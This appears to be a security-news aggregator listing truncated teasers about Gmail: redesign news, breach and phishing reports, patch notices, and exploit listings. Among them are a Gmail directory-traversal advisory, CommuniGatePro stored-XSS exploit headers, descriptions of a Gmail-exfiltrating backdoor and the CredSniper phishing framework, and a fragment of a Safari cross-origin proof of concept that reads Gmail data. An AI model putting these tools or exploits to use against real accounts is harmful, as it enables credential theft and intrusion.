Google Redesigns Gmail – Here's a List of Amazing New Features

Google has finally been rolling out its new massively redesigned Gmail for desktop and mobile to 1.4 billion of users worldwide, which might be the most significant single upgrade in Gmail's history. This huge revamped version of the email service now offers plenty of new features such as...

Google Redesigns Gmail – Here's a List of Amazing New Features

Google has finally been rolling out its new massively redesigned Gmail for desktop and mobile to 1.4 billion of users worldwide, which might be the most significant single upgrade in Gmail's history. This huge revamped version of the email service now offers plenty of new features such as...

A week in security (April 16 – April 22)

Last week, we took a stroll down memory lane talking about Facebook and MySpace, noticed a change in the Magnitude exploit kit—wherein it started adopting the GandCrab ransomware, took a good look at a new form of adware that is based on Python, chatted a bit about Russian hacking with a...

On Dark Web Your Facebook ID is worth $5.20 & Gmail ID just $1

By Waqas Recently we reported about a massive data breach scandal that This is a post from HackRead.com Read the original post: On Dark Web Your Facebook ID is worth $5.20 & Gmail ID just $1...

Powershell-RAT - Python Based Backdoor That Uses Gmail To Exfiltrate Data Through Attachment

Python based backdoor that uses Gmail to exfiltrate data as an e-mail attachment. This RAT will help someone during red team engagements to backdoor any Windows machines. It tracks the user activity using screen capture and sends the information to an attacker as an e-mail attachment. Note: This...

Apple Promises Fix for Latest ‘Text Bomb’ Bug As Abuse Spreads

UPDATE Apple said it is working on a fix for the latest text bomb bug that crashes a number of iOS and Mac apps that display specific Telugu language characters. On Monday, it made good on the promise and announced the availability of a patch CVE-2018-4124 for iOS 11.2.6, watchOS 4.2.3, tvOS...

Security update for webkit2gtk3 (important)

This update for webkit2gtk3 fixes the following issues: Update to version 2.18.5: + Disable SharedArrayBuffers from Web API. + Reduce the precision of "high" resolution time to 1ms. + bsc1075419 - Security fixes: includes improvements to mitigate the effects of Spectre and Meltdown CVE-2017-5753...

Android Gmail < 7.11.5.176568039 - Directory Traversal in Attachment Download Exploit

There is a directory traversal issue in attachment downloads in Gmail. For non-gmail accounts, there is no path sanitization on the attachment filename in the email, so when attachments are downloaded, a file with any name and any contents can be written to anywhere on the filesystem that the Gma...

Android Gmail 7.11.5.176568039 - Directory Traversal in Attachment Download

Android Gmail 7.11.5.176568039 - Directory Traversal in Attachment Download ''' Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1342 There is a directory traversal issue in attachment downloads in Gmail. For non-gmail accounts, there is no path sanitization on the attachment...

Android Gmail &lt; 7.11.5.176568039 - Directory Traversal in Attachment Download

''' Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1342 There is a directory traversal issue in attachment downloads in Gmail. For non-gmail accounts, there is no path sanitization on the attachment filename in the email, so when attachments are downloaded, a file with any name...

CommuniGatePro 6.1.16 Cross Site Scripting Vulnerability

CommuniGatePro version 6.1.16 suffers from multiple stored cross site scripting vulnerabilities. Exploit Title: CommuniGatePro webmails Multiple Stored XSS Exploit Author: Boumediene KADDOUR Unit: Algerie Telecom R&D Unit Vendor Homepage: https://www.stalker.com/ Software Link:...

CommuniGatePro 6.1.16 Cross Site Scripting

Exploit Title: CommuniGatePro webmails Multiple Stored XSS Date: 15/11/2017 Exploit Author: Boumediene KADDOUR Unit: Algerie Telecom R&D Unit Vendor Homepage: https://www.stalker.com/ Software Link: http://www.stalker.com/ paid product Version: 6.1.16 Tested on: production server on crystal, pron...

Terdot Trojan likes social media

We usually advise people that have fallen victim to banker Trojans to change all their passwords, especially the ones that are related to their financial sites and apps. Besides the dangers of re-used passwords, there are other reasons why this is important. This advice is especially applicable t...

CommuniGatePro 6.1.16 - Cross-Site Scripting

Exploit Title: CommuniGatePro webmails Multiple Stored XSS Date: 15/11/2017 Exploit Author: Boumediene KADDOUR Unit: Algerie Telecom R&D Unit Vendor Homepage: https://www.stalker.com/ Software Link: http://www.stalker.com/ paid product Version: 6.1.16 Tested on: production server on crystal, pron...

Phishing Biggest Threat to Google Account Security

Last year may have been mostly about ransomware, but it’s difficult to forget the billion or so passwords that were spilled in high-profile breaches and credential leaks. Google and researchers from the University of California Berkeley attempted to ease some of that pain, and teamed up to analyz...

CredSniper - Phishing Framework which supports SSL and capture credentials with 2FA tokens

Easily launch a new phishing site fully presented with SSL and capture credentials along with 2FA tokens using CredSniper. The API provides secure access to the currently captured credentials which can be consumed by other applications using a randomly generated API token. Benefits Fully supporte...

On ROCA, KRACK, BoundHook, Google Advanced Protection

Threatpost editors Mike Mimoso and Tom Spring recap this week’s infosec news starting with the ROCA vulnerabilities affecting factorization of RSA private keys, the KRACK WPA2 Wi-Fi vulnerabilities, the BoundHook attacks, and Google’s introduction of Advanced Protection for Gmail. Download: Music...

safari10跨域漏洞

safari 10的XMLHttpRequest在null域下可以随意发起跨域请求和设置httpheader 我交到苹果的bugreport，并给apple发邮件后，他们自己悄悄把漏洞修了，连个邮件都没给我发，所以我决定公开poc 这是我在漏洞未修复前截的图： 这个漏洞可以造成同源策略绕过，随便跨域，这是我写的获取gmail数据的代码： html var serveraddress = 'http://127.0.0.1:8000/static/csrfWcn6h/' function deleteSelf let test = document.getElementById'test'...

How SS7 Flaw Can Be Used to Hack Gmail ID and Bitcoin Wallet

By Waqas An old vulnerability in the Signalling System No. 7 SS7 This is a post from HackRead.com Read the original post: How SS7 Flaw Can Be Used to Hack Gmail ID and Bitcoin Wallet...

LinkedIn Phishing Scam Steals Gmail Credentials Through Google Docs

By Waqas LinkedIn, a business and employment-oriented social networking website contain personal information This is a post from HackRead.com Read the original post: LinkedIn Phishing Scam Steals Gmail Credentials Through Google Docs...